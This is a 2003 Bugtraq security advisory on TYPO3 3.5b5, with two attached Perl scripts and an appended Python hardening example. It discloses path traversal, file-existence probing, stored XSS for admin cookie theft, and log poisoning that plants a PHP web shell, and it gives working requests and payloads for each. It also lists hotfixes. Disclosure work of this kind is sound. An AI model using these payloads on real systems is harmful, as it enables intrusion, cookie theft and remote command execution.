92200 2003-02-28 18:49 /221 lines/ Martin Eiszner <martin@websec.org>
Imported: 2003-02-28 18:49 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3729>
Subject: typo3 issues
------------------------------------------------------------
hola,

...

2002@WebSec.org/Martin Eiszner

=====================
Security REPORT TYPO3
=====================

this document: http://www.websec.org/adv/typo3.html

Product:       Typo3 (Version 3.5b5 / earlier versions are possibly vulnerable too)
Vendor:        Typo3 (http://www.typo3.com)
Vendor-Status: kasper@typo3.com informed / new version OUT
Vendor-Patch:  http://typo3.org/1331.0.html
Local:         NO
Remote:        YES

Vulnerabilities:
 -path disclosure
 -proof of file existence
 -arbitrary file retrieval
 -arbitrary command execution
 -cross-site scripting / privilege escalation / cookie theft
 -install/config files and scripts within webroot

Severity: MEDIUM to HIGH

Tested Platforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2

============
Introduction
============

Taken from http://www.typo3.com:

TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules.

=====================
Vulnerability Details
=====================

0) CLIENT-SIDE DATA-OBFUSCATION

form fields are obfuscated using client-side JavaScript routines: after the fields are joined, a script creates MD5 hashes and submits the form. since every input to these hashes is already in the client's hands, anyone can reproduce them outside the browser.

examples: index.php (account data), showpic.php (name checksum)

the attached perl scripts (typo.pl / showpic.pl) demonstrate how to circumvent this protection.

1) PATH-DISCLOSURE

several test, class and library scripts can be found within webroot. some of them can be forced to produce runtime errors and output their physical path.
example: /fileadmin/include_test.php

2) PROOF OF FILE-EXISTENCE

"showpic.php" and "thumbs.php" allow an attacker to check the existence of arbitrary files. combined with file-enumeration methods it is possible to reconstruct parts of the directory and filesystem structure.

example of how to check for existing files with the attached perl script "showpic.pl":

---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'

../../../../../../../../../../etc/hosts exists
---*---

3) CROSS SITE SCRIPTING / COOKIE-THEFT

all system and login errors are saved in the typo3 database, and administrators can view all the erroneous data. since this data is not checked for XSS content it is possible to include client-side script (JavaScript) tags in these entries. every time the admins view their logs these scripts run in the admin's web browser, which leads to a typical XSS bug: it becomes possible to steal the admin's cookies or have him open a new user account without his knowledge.

example with the attached "typo.pl" perl script:

---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---

viewing the log files will execute the script.

4) ARBITRARY FILE-RETRIEVAL

the "dev/translations.php" script does not check the ONLY parameter for malicious values. a relative path combined with a null byte leads to the inclusion of the given file.

example http request:

---*---
GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
---*---

5) ARBITRARY COMMAND EXECUTION

extends vulnerability number 4): if the included file contains php source code it will be executed, thus allowing an attacker to execute operating-system commands and, in the long run, escalate his privileges.

example:

---*---
a file for placing our malicious php source is needed. if there is no file we have write access to, we can still use the webserver's log files.
the following http request:

---cut---
http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c )?>' >> ./x.php` ?>
---cut---

in a typical apache error_log file. using the method discussed under 4), the following http request:

---cut---
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
---cut---

will include the apache error_log in our output and execute our php commands. as a result we will find x.php in our "/dev" directory.

x.php:

---cut---
<?passthru($c)?>
---cut---
---*---

6) SCRIPTS AND DIRECTORIES IN WEBROOT

a couple of scripts, libraries, files and directories can be found within typo3's webroot.

"/install" is improperly protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log files and demo scripts.
"/typo3conf" directory contains localconf.php, database.sql and other sensitive files.

=======
Remarks
=======

the serious vulnerabilities rely on the "/dev" (developer?) directory. scripts within this directory can be found in many/most production environments!

====================
Recommended Hotfixes
====================

overall) install the new Version !

or

1) remove "/install" directory
2) remove "/dev" directory
3) choose strong administrator passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo directories and protect "/fileadmin" and "/typo3conf"

EOF

Martin Eiszner / @2002WebSec.org

=======
Contact
=======

--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37

(92200) /Martin Eiszner <martin@websec.org>/(Reflowed)
Attachment (application/octet-stream) in text 92201
Attachment (application/octet-stream) in text 92202

92201 2003-02-28 18:49 /48 lines/ Martin Eiszner <martin@websec.org>
Attachment filename: "typo.pl"
Imported: 2003-02-28 18:49 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3730>
Attachment (text/plain) to text 92200
Subject: Attachment (typo.pl) to: typo3 issues
------------------------------------------------------------
#!/usr/bin/perl
# typo.pl - performs the typo3 backend login handshake that the login page
# normally runs in client-side JavaScript (vulnerabilities 0 and 3).
# usage: typo.pl <host> <user>:<password>
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use HTTP::Headers;
use HTML::Form;
use Digest::MD5 qw(md5_hex);

my ($thehost,$account) = @ARGV;
my ($uid,$pwd) = split(/:/,$account,2);
my $pass = $pwd;

print "\nchecking $thehost | $uid | $pwd\n";

# the login form hashes the password before combining it with the challenge
$pwd = md5_hex("$pwd");

my $content = "";
my $userident = "";
my $hds = HTTP::Headers->new;
my $ua = new LWP::UserAgent();
push @{ $ua->requests_redirectable }, 'POST';
$ua->agent("Opera 6.0");

# fetch the login page to obtain the session cookie and the challenge value
my $uri = "http://".$thehost."/typo3/typo3/index.php";
my $req = HTTP::Request->new("GET", $uri, $hds, $content);
my $res = $ua->request($req);
my $res_heads = $res->headers;
my $cookie = $res_heads->header("Set-Cookie");
my $form = HTML::Form->parse($res->content, "$uri");
my $challenge = $form->value("challenge");

# userident is the value the browser-side script would compute and submit
$userident = md5_hex("$uid:$pwd:$challenge");

$hds->header('Cookie' => "$cookie");
$hds->header('Content-Type' => "application/x-www-form-urlencoded");
$content  = "username=$uid&p_field=&userident=$userident&challenge=$challenge&redirect_url=alt_main.php";
$content .= "&loginRefresh=&login_status=login&interface=alternative";

# submit the login form (the variables are reused; the original redeclared them with "my")
$req = HTTP::Request->new("POST", $uri, $hds, $content);
$res = $ua->request($req);
$res_heads = $res->headers;
$cookie = $res_heads->header("Set-Cookie");

print "\nRescode:".$res->code()."\n".$res_heads->as_string()."\n\n";
#print "\n".$res_heads->as_string()."\n\n".$res->content()."\n\n";

(92201) /Martin Eiszner <martin@websec.org>/(Reflowed)

92202 2003-02-28 18:49 /14 lines/ Martin Eiszner <martin@websec.org>
Attachment filename: "showpic.pl"
Imported: 2003-02-28 18:49 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3731>
Attachment (text/plain) to text 92200
Subject: Attachment (showpic.pl) to: typo3 issues
------------------------------------------------------------
#!/usr/bin/perl
# showpic.pl - checks whether a file exists via showpic.php (vulnerability 2).
# the md5 "checksum" is derived from the file name alone, so any client can produce it.
# usage: showpic.pl <host> <file>
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);

my ($ho,$fi) = @ARGV;
my $md5 = md5_hex("$fi||||");
my $ua = new LWP::UserAgent();
$ua->agent("Opera 6.0");
my $uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
my $req = HTTP::Request->new("GET",$uri);
my $res = $ua->request($req);

# showpic.php answers differently for a missing file and for an invalid checksum
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {
    print "\n$fi exists\n";
} else {
    print "\n$fi not found\n";
}

(92202) /Martin Eiszner <martin@websec.org>/--------
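The checksum that showpic.pl reproduces (md5 of the file name plus "||||", with no server secret) is the design weakness behind vulnerabilities 0 and 2, and the same request also needs the path containment that translations.php lacked in 4). As an added example that is not part of the original advisory or of Typo3's code, the following Python models the legacy check beside a hardened one: a keyed HMAC the client cannot mint, plus canonicalization that keeps the request under the image root and rejects null bytes. SERVER_SECRET, IMAGE_ROOT and the function names are assumptions.

```python
import hashlib
import hmac
import os

# Constructed values: SERVER_SECRET stands in for a key that lives only on
# the server; IMAGE_ROOT is the directory a showpic-style script may serve from.
SERVER_SECRET = b"constructed-server-side-secret"
IMAGE_ROOT = "/var/www/typo3/fileadmin"


def weak_token(file_param: str) -> str:
    """The scheme showpic.pl reproduces: md5(file + '||||') with no secret.
    Every input is known to the client, so any client can mint a valid token."""
    return hashlib.md5((file_param + "||||").encode()).hexdigest()


def legacy_check(file_param: str, token: str) -> bool:
    """Model of the original behaviour: serve any path whose md5 matches."""
    return hmac.compare_digest(weak_token(file_param), token)


def keyed_token(file_param: str, secret: bytes = SERVER_SECRET) -> str:
    """Server-issued token: HMAC-SHA256 over the file name under a server-only key."""
    return hmac.new(secret, file_param.encode(), hashlib.sha256).hexdigest()


def resolve_inside_root(file_param: str, root: str = IMAGE_ROOT):
    """Canonicalize the request and require it to stay under root.
    Returns the absolute path, or None for NUL bytes, '..' escapes and
    absolute paths (os.path.join discards root when handed one)."""
    if "\x00" in file_param:
        return None
    root = os.path.abspath(root)
    candidate = os.path.normpath(os.path.join(root, file_param))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def authorize(file_param: str, token: str, secret: bytes = SERVER_SECRET,
              root: str = IMAGE_ROOT):
    """Hardened check: the token must be the keyed one (constant-time compare)
    AND the path must resolve inside the image root. Returns the path or None."""
    if not hmac.compare_digest(keyed_token(file_param, secret), token):
        return None
    return resolve_inside_root(file_param, root)
```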